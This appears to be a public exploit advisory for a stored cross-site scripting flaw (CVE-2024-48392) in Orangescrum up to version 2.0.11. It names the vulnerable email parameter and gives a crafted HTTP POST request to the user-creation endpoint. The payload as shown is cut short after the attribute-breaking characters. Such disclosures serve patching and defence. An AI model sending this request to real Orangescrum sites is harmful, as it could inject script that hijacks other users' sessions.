# Exploit Title: Orangescrum Premium or Self-Hosted <= V2.0.11 'data[User][email]' Stored Cross Site Scripting (XSS) # Date: 11-07-2024 # Exploit Author: Aziz Nefzi # Vendor Homepage: https://www.orangescrum.com/ # GitHub Repo Link: https://github.com/Orangescrum/orangescrum # Version: V2.0.11 # CVE: CVE-2024-48392 Parameters: data[User][email] Payload: {{VALID EMAIL}}"> Exploit: POST /users/new_user HTTP/2 Host: [REDACTED].orangescrum.com Cookie: [REDACTED] _method=POST&data%5B_Token%5D=[FILTERED]&data%5BUser%5D%5BtimezoneName%5D=&data%5BUser%5D%5Bid%5D=28&data%5BUser%5D%5Bemail%5D={{VALID EMAIL}}"> &data%5BUser%5D%5Bpid%5D=143325&data%5BUser%5D%5Brole%5D=3&data%5B_Token%5D%5Bfields%5D=&data%5B_Token%5D%5Bunlocked%5D=